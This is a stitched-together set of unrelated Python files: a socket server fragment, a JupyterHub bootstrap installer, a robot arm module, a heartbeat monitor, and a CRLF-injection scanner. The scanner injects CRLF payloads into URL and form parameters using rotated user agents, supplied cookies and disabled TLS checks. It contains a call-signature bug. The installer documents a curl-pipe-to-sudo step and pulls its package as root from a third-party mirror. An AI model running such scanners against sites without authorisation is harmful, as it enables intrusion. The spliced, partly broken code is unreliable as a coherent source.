print(e)
            self.destroy()
    def destroy(self):
self.alive = False
self.sockServ.users.remove(self)
self.conn.close()
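# Illustrative usage sketch (not part of the original file, and assuming the module's
# own imports resolve): start a server on a placeholder port and print every decoded
# message; the port number and callback name are assumptions for demonstration only.
if __name__ == "__main__":
    def on_message(data):
        # data is the already-decoded JSON payload
        print("received:", data)
    sockServer(8765, receiveEvent=on_message)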
|
bootstrap.py
|
"""
Bootstrap an installation of TLJH.
Sets up just enough TLJH environments to invoke tljh.installer.
This script is run as:
curl <script-url> | sudo python3 -
Constraints:
- Entire script should be compatible with Python 3.6 (We run on Ubuntu 18.04+)
- Script should parse in Python 3.4 (since we exit with useful error message on Ubuntu 14.04+)
- Use stdlib modules only
"""
import os
from http.server import SimpleHTTPRequestHandler, HTTPServer
import multiprocessing
import subprocess
import sys
import logging
import shutil
import urllib.request
html = """
<html>
<head>
<title>The Littlest JupyterHub</title>
</head>
<body>
<meta http-equiv="refresh" content="30" >
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width">
<img class="logo" src="https://raw.githubusercontent.com/jupyterhub/the-littlest-jupyterhub/master/docs/images/logo/logo.png">
<div class="loader center"></div>
<div class="center main-msg">Please wait while your TLJH is building...</div>
<div class="center logs-msg">Click the button below to see the logs</div>
<div class="center tip" >Tip: to update the logs, refresh the page</div>
<button class="logs-button center" onclick="window.location.href='/logs'">View logs</button>
</body>
<style>
button:hover {
background: grey;
}
.logo {
width: 150px;
height: auto;
}
.center {
margin: 0 auto;
margin-top: 50px;
text-align:center;
display: block;
}
.main-msg {
font-size: 30px;
font-weight: bold;
color: grey;
text-align:center;
}
.logs-msg {
font-size: 15px;
color: grey;
}
.tip {
font-size: 13px;
color: grey;
margin-top: 10px;
font-style: italic;
}
.logs-button {
margin-top:15px;
border: 0;
color: white;
padding: 15px 32px;
font-size: 16px;
cursor: pointer;
background: #f5a252;
}
.loader {
width: 150px;
height: 150px;
border-radius: 90%;
border: 7px solid transparent;
animation: spin 2s infinite ease;
animation-direction: alternate;
}
@keyframes spin {
0% {
transform: rotateZ(0deg);
border-top-color: #f17c0e
}
100% {
transform: rotateZ(360deg);
border-top-color: #fce5cf;
}
}
</style>
</html>
"""
logger = logging.getLogger(__name__)
def get_os_release_variable(key):
"""
Return value for key from /etc/os-release
/etc/os-release is a bash file, so should use bash to parse it.
Returns empty string if key is not found.
"""
return subprocess.check_output([
'/bin/bash', '-c',
"source /etc/os-release && echo ${{{key}}}".format(key=key)
]).decode().strip()
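# For example (illustrative): on an Ubuntu host, get_os_release_variable('ID')
# returns 'ubuntu' and get_os_release_variable('VERSION_ID') a string such as '20.04'.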
# Copied into tljh/utils.py. Make sure the copies are exactly the same!
def run_subprocess(cmd, *args, **kwargs):
"""
Run given cmd with smart output behavior.
If command succeeds, print output to debug logging.
If it fails, print output to info logging.
In TLJH, this sends successful output to the installer log,
and failed output directly to the user's screen
"""
logger = logging.getLogger('tljh')
proc = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, *args, **kwargs)
printable_command = ' '.join(cmd)
if proc.returncode != 0:
# Our process failed! Show output to the user
logger.error('Ran {command} with exit code {code}'.format(
command=printable_command, code=proc.returncode
))
logger.error(proc.stdout.decode())
raise subprocess.CalledProcessError(cmd=cmd, returncode=proc.returncode)
else:
# This goes into installer.log
logger.debug('Ran {command} with exit code {code}'.format(
command=printable_command, code=proc.returncode
))
# This produces multi line log output, unfortunately. Not sure how to fix.
# For now, prioritizing human readability over machine readability.
logger.debug(proc.stdout.decode())
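# For example (illustrative): run_subprocess(['apt-get', 'update', '--yes']) logs the
# command output at debug level on success; on failure it logs the output at error
# level and raises CalledProcessError.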
def validate_host():
"""
Make sure TLJH is installable in current host
"""
# Support only Ubuntu 18.04+
distro = get_os_release_variable('ID')
version = float(get_os_release_variable('VERSION_ID'))
if distro != 'ubuntu':
print('The Littlest JupyterHub currently supports Ubuntu Linux only')
sys.exit(1)
elif float(version) < 18.04:
print('The Littlest JupyterHub requires Ubuntu 18.04 or higher')
sys.exit(1)
if sys.version_info < (3, 5):
print("bootstrap.py must be run with at least Python 3.5")
sys.exit(1)
if not (shutil.which('systemd') and shutil.which('systemctl')):
print("Systemd is required to run TLJH")
# Only fail running inside docker if systemd isn't present
if os.path.exists('/.dockerenv'):
print("Running inside a docker container without systemd isn't supported")
print("We recommend against running a production TLJH instance inside a docker container")
print("For local development, see http://tljh.jupyter.org/en/latest/contributing/dev-setup.html")
sys.exit(1)
class LoaderPageRequestHandler(SimpleHTTPRequestHandler):
def do_GET(self):
if self.path == "/logs":
with open("/opt/tljh/installer.log", "r") as log_file:
logs = log_file.read()
self.send_response(200)
self.send_header('Content-Type', 'text/plain; charset=utf-8')
self.end_headers()
self.wfile.write(logs.encode('utf-8'))
elif self.path == "/index.html":
self.path = "/var/run/index.html"
return SimpleHTTPRequestHandler.do_GET(self)
elif self.path == "/favicon.ico":
self.path = "/var/run/favicon.ico"
return SimpleHTTPRequestHandler.do_GET(self)
elif self.path == "/":
self.send_response(302)
self.send_header('Location','/index.html')
self.end_headers()
else:
SimpleHTTPRequestHandler.send_error(self, code=403)
def serve_forever(server):
try:
server.serve_forever()
except KeyboardInterrupt:
pass
def main():
flags = sys.argv[1:]
temp_page_flag = "--show-progress-page"
# Check for flag in the argv list. This doesn't use argparse
    # because it's the only argument that's meant for the bootstrap script.
# All the other flags will be passed to and parsed by the installer.
if temp_page_flag in flags:
with open("/var/run/index.html", "w+") as f:
f.write(html)
favicon_url="https://raw.githubusercontent.com/jupyterhub/jupyterhub/master/share/jupyterhub/static/favicon.ico"
urllib.request.urlretrieve(favicon_url, "/var/run/favicon.ico")
# If the bootstrap is run to upgrade TLJH, then this will raise an "Address already in use" error
try:
loading_page_server = HTTPServer(("", 80), LoaderPageRequestHandler)
p = multiprocessing.Process(target=serve_forever, args=(loading_page_server,))
# Serves the loading page until TLJH builds
p.start()
# Remove the flag from the args list, since it was only relevant to this script.
flags.remove("--show-progress-page")
            # Pass the server's pid as a flag to the installer
pid_flag = "--progress-page-server-pid"
flags.extend([pid_flag, str(p.pid)])
except OSError:
# Only serve the loading page when installing TLJH
pass
validate_host()
install_prefix = os.environ.get('TLJH_INSTALL_PREFIX', '/opt/tljh')
hub_prefix = os.path.join(install_prefix, 'hub')
# Set up logging to print to a file and to stderr
os.makedirs(install_prefix, exist_ok=True)
file_logger_path = os.path.join(install_prefix, 'installer.log')
file_logger = logging.FileHandler(file_logger_path)
# installer.log should be readable only by root
os.chmod(file_logger_path, 0o500)
file_logger.setFormatter(logging.Formatter('%(asctime)s %(message)s'))
file_logger.setLevel(logging.DEBUG)
logger.addHandler(file_logger)
stderr_logger = logging.StreamHandler()
stderr_logger.setFormatter(logging.Formatter('%(message)s'))
stderr_logger.setLevel(logging.INFO)
logger.addHandler(stderr_logger)
logger.setLevel(logging.DEBUG)
logger.info('Checking if TLJH is already installed...')
if os.path.exists(os.path.join(hub_prefix, 'bin', 'python3')):
logger.info('TLJH already installed, upgrading...')
initial_setup = False
else:
logger.info('Setting up hub environment')
initial_setup = True
# Install software-properties-common, so we can get add-apt-repository
# That helps us make sure the universe repository is enabled, since
# that's where the python3-pip package lives. In some very minimal base
# VM images, it looks like the universe repository is disabled by default,
# causing bootstrapping to fail.
run_subprocess(['apt-get', 'update', '--yes'])
run_subprocess(['apt-get', 'install', '--yes', 'software-properties-common'])
run_subprocess(['add-apt-repository', 'universe'])
run_subprocess(['apt-get', 'update', '--yes'])
run_subprocess(['apt-get', 'install', '--yes',
'python3',
'python3-venv',
'python3-pip',
'git'
])
logger.info('Installed python & virtual environment')
os.makedirs(hub_prefix, exist_ok=True)
run_subprocess(['python3', '-m', 'venv', hub_prefix])
logger.info('Set up hub virtual environment')
if initial_setup:
logger.info('Setting up TLJH installer...')
else:
logger.info('Upgrading TLJH installer...')
pip_flags = ['--upgrade']
if os.environ.get('TLJH_BOOTSTRAP_DEV', 'no') == 'yes':
pip_flags.append('--editable')
tljh_repo_path = os.environ.get(
'TLJH_BOOTSTRAP_PIP_SPEC',
'git+https://gitee.com/jiangroubao/the-littlest-jupyterhub.git'
)
# Upgrade pip
run_subprocess([
os.path.join(hub_prefix, 'bin', 'pip'),
'install',
'--upgrade',
'pip==20.0.*'
])
logger.info('Upgraded pip')
run_subprocess([
os.path.join(hub_prefix, 'bin', 'pip'),
'install'
] + pip_flags + [tljh_repo_path])
logger.info('Setup tljh package')
logger.info('Starting TLJH installer...')
os.execv(
os.path.join(hub_prefix, 'bin', 'python3'),
[
os.path.join(hub_prefix, 'bin', 'python3'),
'-m',
'tljh.installer',
] + flags
)
if __name__ == '__main__':
main()
|
arm.py
|
"""Arm part module.
Implements a Right and a Left Arm.
"""
import time
import numpy as np
from operator import attrgetter
from collections import OrderedDict
from threading import Thread, Event
from .hand import LeftEmptyHand, RightEmptyHand, LeftForceGripper, RightForceGripper, OrbitaWrist
from .part import ReachyPart
hands = {
'force_gripper': {'left': LeftForceGripper, 'right': RightForceGripper},
'orbita_wrist': {'left': OrbitaWrist, 'right': OrbitaWrist},
'empty_hand': {'left': LeftEmptyHand, 'right': RightEmptyHand},
}
class Arm(ReachyPart):
"""Arm abstraction class.
Args:
side (str): 'right' or 'left'
io (str): port name where the modules can be found
dxl_motors (dict): config of the dynamixel motors composing the arm
        hand (str): name of the Hand to attach ('force_gripper', 'orbita_wrist', or None if no hand is attached)
Provides high-level access to:
* ordered list of motors
* forward and inverse kinematics
"""
fans = {
'shoulder_fan': 'shoulder_pitch',
'elbow_fan': 'elbow_pitch',
}
lower_temp_threshold, upper_temp_threshold = 40, 45
def __init__(self, side, io, dxl_motors, hand):
"""Create a new Arm part."""
ReachyPart.__init__(self, name=f'{side}_arm', io=io)
self.side = side
dxl_motors = OrderedDict(dxl_motors)
self.attach_dxl_motors(dxl_motors)
if hand is not None and hand not in hands.keys():
raise ValueError(f'"hand" must be one of {list(hands.keys())} or None!')
if hand is not None:
hand_cls = hands[hand][side]
hand_part = hand_cls(root=self, io=io)
self.motors += hand_part.motors
self.hand = hand_part
for m, conf in hand_cls.dxl_motors.items():
dxl_motors[m] = conf
else:
self.hand = None
self.attach_kinematic_chain(dxl_motors)
self.fans = dict(Arm.fans)
if hand is not None:
self.fans.update(hand_cls.fans)
for name in self.fans.keys():
setattr(self, name, self.io.find_fan(name))
self._monitor_temp = Event()
self._monitor_temp_loop = None
self.enable_temperature_monitoring()
def teardown(self):
"""Clean up before closing."""
if self.hand is not None:
self.hand.teardown()
ReachyPart.teardown(self)
def __repr__(self):
"""Arm representation."""
return f'<{self.side.capitalize()}Arm "motors": {self.motors} "hand": {self.hand}>'
def forward_kinematics(self, joints_position, use_rad=False):
"""Compute the forward kinematics of the Arm.
Args:
joints_position (:py:class:`~numpy.ndarray`): angle joints configuration of the arm (in degrees by default)
use_rad (bool): whether or not to use radians for joints configuration
.. note:: the end effector will be the end of the Hand if one is attached.
"""
joints_position = np.array(joints_position)
if len(joints_position.shape) == 1:
joints_position = joints_position.reshape(1, -1)
if not use_rad:
joints_position = np.deg2rad(joints_position)
M = self.kin_chain.forward(joints_position)
if joints_position.shape[0] == 1:
M = M[0]
return M
def inverse_kinematics(self, target_pose, q0=None, use_rad=False, maxiter=10):
"""Approximate the inverse kinematics of the Arm.
Args:
target_pose (:py:class:`~numpy.ndarray`): 4x4 homogeneous pose of the target end effector pose
            q0 (:py:class:`~numpy.ndarray`): joint initial angle configurations (used for bootstrapping the optimization)
use_rad (bool): whether or not to use radians for joints configuration
            maxiter (int): maximum number of iterations to run in the optimizer
.. note:: the end effector will be the end of the Hand if one is attached.
"""
if q0 is None:
q0 = [m.present_position for m in self.motors]
q0 = np.array(q0)
if len(q0.shape) == 1:
q0 = q0.reshape(1, -1)
if len(target_pose.shape) == 2:
target_pose = target_pose.reshape(-1, 4, 4)
if not use_rad:
q0 = np.deg2rad(q0)
J = self.kin_chain.inverse(target_pose, q0, maxiter=maxiter)
if J.shape[0] == 1:
J = J[0]
if not use_rad:
J = np.rad2deg(J)
return J
def enable_temperature_monitoring(self):
"""Enable the automatic motor cooling procedure.
        The temperature of the watched motors is monitored; when a motor reaches the upper threshold, its fan is automatically turned on.
        When the temperature drops back below the lower threshold, the fan is turned off.
"""
if not self._monitor_temp.is_set():
self._monitor_temp.set()
self._monitor_temp_loop = Thread(target=self._temperature_monitoring)
self._monitor_temp_loop.daemon = True
self._monitor_temp_loop.start()
def disable_temperature_monitoring(self):
"""Disable the automatic motor cooling procedure."""
if self._monitor_temp.is_set():
self._monitor_temp.clear()
def _temperature_monitoring(self):
while self._monitor_temp.is_set():
for fan_name, motor_name in self.fans.items():
fan = attrgetter(fan_name)(self)
motor = attrgetter(motor_name)(self)
if motor.temperature is not None and motor.temperature >= self.upper_temp_threshold:
fan.on()
elif motor.temperature is not None and motor.temperature <= self.lower_temp_threshold:
fan.off()
time.sleep(30)
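# Illustrative usage sketch (not part of the original module; requires real hardware,
# and the io port name below is a placeholder):
#     arm = RightArm(io='/dev/ttyUSB0', hand='force_gripper')
#     q = [m.present_position for m in arm.motors]
#     pose = arm.forward_kinematics(q)            # 4x4 homogeneous end-effector pose
#     q_back = arm.inverse_kinematics(pose, q0=q)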
class LeftArm(Arm):
"""Left Arm part.
Args:
io (str): port name where the modules can be found
        hand (str): name of the :py:class:`~reachy.parts.hand.Hand` to attach ('force_gripper', 'orbita_wrist', or None if no hand is attached)
"""
dxl_motors = OrderedDict([
('shoulder_pitch', {
'id': 20, 'offset': 90.0, 'orientation': 'direct',
'angle-limits': [-60, 180],
'link-translation': [0, 0.19, 0], 'link-rotation': [0, 1, 0]
}),
('shoulder_roll', {
'id': 21, 'offset': -90.0, 'orientation': 'indirect',
'angle-limits': [-90, 100],
'link-translation': [0, 0, 0], 'link-rotation': [1, 0, 0],
}),
('arm_yaw', {
'id': 22, 'offset': 0.0, 'orientation': 'indirect',
'angle-limits': [-90, 90],
'link-translation': [0, 0, 0], 'link-rotation': [0, 0, 1],
}),
('elbow_pitch', {
'id': 23, 'offset': 0.0, 'orientation': 'indirect',
'angle-limits': [0, 125],
'link-translation': [0, 0, -0.28], 'link-rotation': [0, 1, 0],
}),
])
def __init__(self, io, hand=None):
"""Create a new Left Arm part."""
Arm.__init__(self, side='left',
io=io, dxl_motors=LeftArm.dxl_motors,
hand=hand)
class RightArm(Arm):
"""Right Arm part.
Args:
io (str): port name where the modules can be found
        hand (str): name of the :py:class:`~reachy.parts.hand.Hand` to attach ('force_gripper', 'orbita_wrist', or None if no hand is attached)
"""
"""
('shoulder_pitch', {
'id': 10, 'offset': 90.0, 'orientation': 'indirect',
'angle-limits': [-180, 60],
'link-translation': [0, -0.19, 0], 'link-rotation': [0, 1, 0],
}),
('shoulder_roll', {
'id': 11, 'offset': 90.0, 'orientation': 'indirect',
'angle-limits': [-100, 90],
'link-translation': [0, 0, 0], 'link-rotation': [1, 0, 0],
}),
('arm_yaw', {
'id': 12, 'offset': 0.0, 'orientation': 'indirect',
'angle-limits': [-90, 90],
'link-translation': [0, 0, 0], 'link-rotation': [0, 0, 1],
}),
('elbow_pitch', {
'id': 13, 'offset': 0.0, 'orientation': 'indirect',
'angle-limits': [0, 125],
'link-translation': [0, 0, -0.28], 'link-rotation': [0, 1, 0],
}),
"""
dxl_motors = OrderedDict([
('shoulder_pitch', {
# OK
'id': 10, 'offset': -90.0, 'orientation': 'indirect',
'angle-limits': [-180, 60],
'link-translation': [0, -0.19, 0], 'link-rotation': [0, 1, 0],
}),
('shoulder_roll', {
# TODO: still need to fix offset
'id': 11, 'offset': 0, 'orientation': 'indirect',
'angle-limits': [-180, 10],
'link-translation': [0, 0, 0], 'link-rotation': [1, 0, 0],
}),
('arm_yaw', {
# OK
'id': 12, 'offset': 5.0, 'orientation': 'indirect',
'angle-limits': [-90, 90],
'link-translation': [0, 0, 0], 'link-rotation': [0, 0, 1],
}),
('elbow_pitch', {
# OK
'id': 13, 'offset': 45.0, 'orientation': 'indirect',
'angle-limits': [-125, 0],
'link-translation': [0, 0, -0.28], 'link-rotation': [0, 1, 0],
}),
])
def __init__(self, io, hand=None):
"""Create a new Right Arm part."""
Arm.__init__(self, side='right',
io=io, dxl_motors=RightArm.dxl_motors,
hand=hand)
|
heartbeat.py
|
import os
import time
import pprint
import signal
import threading as mt
from .misc import as_list
from .logger import Logger
# ------------------------------------------------------------------------------
#
class Heartbeat(object):
# --------------------------------------------------------------------------
#
def __init__(self, uid, timeout, interval=1, beat_cb=None, term_cb=None,
log=None):
'''
This is a simple hearteat monitor: after construction, it's `beat()`
method needs to be called in intervals shorter than the given `timeout`
value. A thread will be created which checks if heartbeats arrive
timely - if not, the current process is killed via `os.kill()` (but see
below).
If a callback `beat_cb` is specified, the watcher will also invoke that
callback after every `interval` seconds. This can be used to ensure
heartbeats by the owning instance (which may feed this or any other
`Heartbeat` monitor instance). The `term_cb` callback is invoked on
heartbeat failure, i.e., just before the process would be killed, and
gets a single argument, the uid of the failing heartbeat sender. If
that term callback returns `True`, the kill is avoided though: timers
are reset and everything continues like before. This should be used to
recover from failing components.
        When timeout is set to `None`, missing heartbeats will never trigger any
        action.
'''
# we should not need to lock timestamps, in the current CPython
# implementation, dict access is assumed to be atomic. But heartbeats
# should not be in the performance critical path, and should not have
# threads competing with the (private) dict lock, so we accept the
# overhead.
if timeout and interval > timeout:
raise ValueError('timeout [%.1f] too small [>%.1f]'
% (timeout, interval))
self._uid = uid
self._log = log
self._timeout = timeout
self._interval = interval
self._beat_cb = beat_cb
self._term_cb = term_cb
self._term = mt.Event()
self._lock = mt.Lock()
self._tstamps = dict()
self._pid = os.getpid()
self._watcher = None
if not self._log:
self._log = Logger('radical.utils.heartbeat')
# --------------------------------------------------------------------------
#
def start(self):
self._log.debug('start heartbeat')
self._watcher = mt.Thread(target=self._watch)
self._watcher.daemon = True
self._watcher.start()
# --------------------------------------------------------------------------
#
def stop(self):
self._term.set()
# # no need to join, is a daemon thread
# self._watcher.join()
# --------------------------------------------------------------------------
#
@property
def uid(self):
return self._uid
# --------------------------------------------------------------------------
#
def dump(self, log):
if not log: log = self._log
log.debug('hb dump %s: \n%s', self._uid, pprint.pformat(self._tstamps))
# --------------------------------------------------------------------------
#
def _watch(self):
# initial heartbeat without delay
if self._beat_cb:
self._beat_cb()
while not self._term.is_set():
time.sleep(self._interval)
now = time.time()
if self._beat_cb:
self._beat_cb()
# avoid iteration over changing dict
with self._lock:
uids = list(self._tstamps.keys())
for uid in uids:
# self._log.debug('hb %s check %s', self._uid, uid)
with self._lock:
last = self._tstamps.get(uid)
if last is None:
self._log.warn('hb %s[%s]: never seen', self._uid, uid)
continue
if now - last > self._timeout:
if self._log:
                        self._log.warn('hb %s[%s]: %.1f - %.1f > %.1f: timeout',
self._uid, uid, now, last, self._timeout)
ret = None
if self._timeout:
# attempt to recover
if self._term_cb:
ret = self._term_cb(uid)
else:
# we silently assume that the watchee recovered, thus
# avoiding termination
ret = True
if ret is None:
# could not recover: abandon mothership
self._log.warn('hb fail %s: fatal (%d)', uid, self._pid)
os.kill(self._pid, signal.SIGTERM)
time.sleep(1)
os.kill(self._pid, signal.SIGKILL)
else:
# recovered - the failed UID was replaced with the one
# returned by the callback. We delete the heartbeat
# information for the old uid and register a new
# heartbeat for the new one, so that we can immediately
# begin to watch it.
self._log.info('hb recover %s -> %s (%s)',
uid, ret, self._term_cb)
with self._lock:
del(self._tstamps[uid])
self._tstamps[ret] = time.time()
# --------------------------------------------------------------------------
#
def beat(self, uid=None, timestamp=None):
if not timestamp:
timestamp = time.time()
if not uid:
uid = 'default'
# self._log.debug('hb %s beat [%s]', self._uid, uid)
with self._lock:
self._tstamps[uid] = timestamp
# # --------------------------------------------------------------------------
# #
# def is_alive(self, uid=None):
# '''
# Check if an entity of the given UID sent a recent heartbeat
# '''
#
# if not uid:
# uid = 'default'
#
# with self._lock:
# ts = self._tstamps.get(uid)
#
# if ts and time.time() - ts <= self._timeout:
# return True
#
# return False
# --------------------------------------------------------------------------
#
def wait_startup(self, uids=None, timeout=None):
'''
Wait for the first heartbeat of the given UIDs to appear. This returns
the list of UIDs which have *not* been found, or `None` otherwise.
'''
if not uids:
uids = ['default']
uids = as_list(uids)
start = time.time()
ok = list()
while True:
with self._lock:
ok = [uid for uid in uids if self._tstamps.get(uid)]
nok = [uid for uid in uids if uid not in ok]
self._log.debug('wait for : %s', nok)
if len(ok) == len(uids):
break
if timeout:
if time.time() - start > timeout:
self._log.debug('wait time: %s', nok)
break
time.sleep(0.05)
if len(ok) != len(uids):
nok = [uid for uid in uids if uid not in ok]
self._log.debug('wait fail: %s', nok)
return nok
else:
self._log.debug('wait ok : %s', ok)
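# Illustrative usage sketch for the Heartbeat class (not part of the original module);
# the uids, timeout and interval below are placeholders:
#     hb = Heartbeat(uid='demo', timeout=5.0, interval=1.0,
#                    term_cb=lambda uid: True)   # returning True avoids the kill
#     hb.start()
#     hb.beat(uid='worker.0')   # call at least every 5 seconds per watched uid
#     hb.stop()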
# ------------------------------------------------------------------------------
|
crlf_injection_v1.py
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import mechanize
import requests
import random
import sys
from urlparse import urlparse
from urlparse import parse_qs
from urlparse import urlunsplit
import timeit
import argparse
import os
import multiprocessing as mp
import time
from pymongo import MongoClient
connection = MongoClient()
db = connection.crwaler # database name
user_agents = ["Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36", \
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36", \
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36", \
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2", \
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0", \
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0", \
"Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))", \
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)"
]
def dictToQuery(d):
query = ""
for key in d.keys():
query += str(key) + "=" + str(d[key]) + "&"
return query[:-1]
# make parameters from html form
def make_parameters(url):
br = mechanize.Browser()
if cookie is None:
br.addheaders = [('User-agent', random.choice(user_agents))]
else:
br.addheaders = [('User-agent', random.choice(user_agents)),\
("Cookie", cookie)]
br.set_handle_equiv(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
try:
br.open(url)
except Exception as e:
return False
method = ""
action = ""
result = []
try:
forms = [f for f in br.forms()]
except Exception as e:
return False
if forms == []:
return False
for form in forms:
try:
method = form.method
except:
method = "GET"
try:
action = form.action
except Exception as e:
print e
payloads = {}
method = form.method
action = form.action
value_number = len(form.controls)
for value in range(value_number):
try:
name = str(form.controls[value].name)
except:
name = ""
try:
value = str(form.controls[value].value)
except:
value = ""
payloads[name] = value
result.append([payloads, method, action])
return result
def save_data(method, case, url, payloads, res):
headers = res.headers
for header in headers.keys():
report_collection = db["report"]
# crlf in header value
if (header.find("injected") != -1) or (headers[header].find("injected") != -1):
# if header.find("injected"):
# case2 and post
if payloads:
report_collection.insert({"url" : url,
"attack name" : "crlf injection",
"method" : method,
"case" : case,
"payload" : payloads,
"res_code" : res.status_code,
"res_length" : len(str(res.content)),
"res_headers" : str(res.headers)
# "res_content" : res.content,
# "res_time" : res.elapsed.total_seconds()
})
print "[+] [%s] %s" %(case, url)
# case1 and get, case2 and get
else:
report_collection.insert({"url" : url,
"attack name" : "crlf injection",
"method" : method,
"case" : case,
"payload" : res.url,
"res_code" : res.status_code,
"res_length" : len(str(res.content)),
"res_headers" : str(res.headers)
# "res_content" : res.content,
# "res_time" : res.elapsed.total_seconds()
})
print "[+] [%s] %s" %(case, url)
def web_request(payloads, method, action, case):
url_scheme = urlparse(action)[0]
url_location = urlparse(action)[1]
action = urlunsplit((url_scheme, url_location, "", "", ""))
if method == "GET" and case == "case1":
try:
if cookie is None:
try:
res = requests.get(action, timeout = 1, \
headers = {"User-Agent" : random.choice(user_agents)},\
verify = False,\
params = payloads)
save_data(method, case, str(url_location), None, res)
except (KeyboardInterrupt, SystemExit):
connection.close()
sys.exit(0)
except Exception as e:
pass
else:
pass
else:
try:
res = requests.get(action, timeout = 1,\
headers = {"User-Agent" : random.choice(user_agents),\
"Cookie" : cookie},\
verify = False,\
params = payloads)
save_data(method, case, str(url_location), None, res)
except (KeyboardInterrupt, SystemExit):
connection.close()
sys.exit(0)
except Exception as e:
pass
else:
pass
except Exception as e:
print action
print e
elif method == "GET" and case == "case2":
try:
if cookie is None:
try:
res = requests.get(action, timeout = 1, \
headers = {"User-Agent" : random.choice(user_agents)},\
params = payloads,\
verify = False)
save_data(method, case, str(url_location), None, res)
except (KeyboardInterrupt, SystemExit):
connection.close()
sys.exit(0)
except Exception as e:
pass
else:
pass
else:
try:
res = requests.get(action, timeout = 1, \
headers = {"User-Agent" : random.choice(user_agents),\
"Cookie" : cookie},\
verify = False,\
params = payloads)
save_data(method, case, str(url_location), None, res)
except (KeyboardInterrupt, SystemExit):
connection.close()
sys.exit(0)
except Exception as e:
pass
else:
pass
except Exception as e:
print action
print e
elif method == "POST" and case == "case3":
try:
if cookie is None:
try:
res = requests.post(action, timeout = 1, \
headers = {"User-Agent" : random.choice(user_agents)},\
data = payloads,\
verify = False)
save_data(method, case, str(url_location), None, res)
except (KeyboardInterrupt, SystemExit):
connection.close()
sys.exit(0)
except Exception as e:
pass
else:
pass
else:
try:
res = requests.post(action, timeout = 1, \
headers = {"User-Agent" : random.choice(user_agents),\
"Cookie" : cookie},\
verify = False,\
data = payloads)
save_data(method, case, str(url_location), None, res)
except (KeyboardInterrupt, SystemExit):
connection.close()
sys.exit(0)
except Exception as e:
pass
else:
pass
except Exception as e:
print action
print e
def crlf_attack(payloads, method, action, case):
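    # inject each attack string into one parameter at a time, restoring the original value before moving on to the next parameter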
tmp_value = ""
for name in payloads.keys():
tmp_value = payloads[name]
for attack_command in attack_commands:
payloads[name] += attack_command
web_request(payloads, method, action, case)
payloads[name] = tmp_value
def partition(lst, n):
return [ lst[i::n] for i in xrange(n) ]
def attack_case1(urls, links_to_visit_params):
# links_to_visit_params will be queue
for url in urls:
# there are payloads in url
if urlparse(url)[4]:
payloads = parse_qs(urlparse(url).query)
# method
# from {u'action': [u'M01']} to {u'action': u'M01'}
for name in payloads.keys():
payloads[name] = payloads[name][0]
url_with_params = str(urlparse(url)[2]) + str(sorted(payloads.keys()))
# to reduce duplicate urls
if url_with_params not in links_to_visit_params:
# case1: there are parameters in url, not action
crlf_attack(payloads, "GET", url, "case1", attack_commands)
links_to_visit_params.append(url_with_params)
# form test
def attack_case2(urls, links_to_visit_params):
# links_to_visit_params later to queue
for url in urls:
results = make_parameters(url)
# if there is no form, it return False
if results:
for result in results:
# none attr is submit
payloads = result[0]
try:
del payloads["None"]
except Exception as e:
pass
method = result[1]
action = result[2]
if method == "GET":
url_with_params = str(urlparse(action)[2]) + str(sorted(payloads.keys()))
# to reduce duplicate urls
if url_with_params not in links_to_visit_params:
crlf_attack(payloads, "GET", action, "case2", attack_commands)
links_to_visit_params.append(url_with_params)
elif method == "POST":
url_with_params = str(urlparse(action)[2]) + str(sorted(payloads.keys()))
# to reduce duplicate urls
if url_with_params not in links_to_visit_params:
crlf_attack(payloads, "POST", action, "case3", attack_commands)
links_to_visit_params.append(url_with_params)
def predict_crlf_attack_time():
attack_command_len = len(attack_commands)
urls = []
cnt = 0
for url in collection.find({"res_code" : "200"}, {"url" : 1}):
urls.append(url["url"])
for url in urls:
payloads = parse_qs(urlparse(url).query)
payloads_number = len(payloads.keys())
cnt += payloads_number
all_count = str(cnt * attack_command_len * 3)
    estimate_time = str(cnt * attack_command_len * 3 * 0.005)
    # each request seems to take roughly 0.005 - 0.01 seconds
    print "*" * 120
    print "total attack requests will be " + all_count
    print "estimated attack time will be " + estimate_time + " seconds"
print "*" * 120
def main():
    usage = '''./crlf_injection_v1.py -t google'''
parser = argparse.ArgumentParser(description = "crlf injection for pen testing", \
usage = usage)
parser.add_argument("-t", "--table", required=True, help="sqlite table name to attack")
parser.add_argument("-c", "--cookie", required=False, help="filename containing cookie")
parser.add_argument("-v", "--version", action='version', version = 'JongWon Kim (dikien2012@gmail.com)\n%(prog)s - v.1.0 (04/24/2014)')
args = parser.parse_args()
global cookie
# read cookie from file
cookie_filename = args.cookie
try:
f = open(cookie_filename).read()
cookie = str(f).strip()
except:
cookie = None
    # attack strings (CRLF payloads) used for injection
global attack_commands
attack_commands = ["\r\n injected"]
global start_time
start_time = timeit.default_timer()
links_to_visit_params = []
global table_name
table_name = args.table
global collection
collection = db[table_name]
predict_crlf_attack_time()
ncores = mp.cpu_count()
processes = []
# case 1
urls = []
for url in collection.find({"res_code" : "200"}, {"url" : 1}):
urls.append(url["url"])
urls = partition(urls, ncores)
for url in urls:
process = mp.Process(target=attack_case1, args=(url, links_to_visit_params))
processes.append(process)
process.start()
for item in processes:
item.join()
processes = []
# case 2, 3
urls = []
for url in collection.find({"res_code" : "200"}, {"url" : 1}):
urls.append(url["url"])
urls = partition(urls, ncores)
for url in urls:
process = mp.Process(target=attack_case2, args=(url, links_to_visit_params))
processes.append(process)
process.start()
for item in processes:
item.join()
end_time = timeit.default_timer()
print "*" * 120
print '\ncrlf injection attack is done: ', end_time - start_time
print "*" * 120
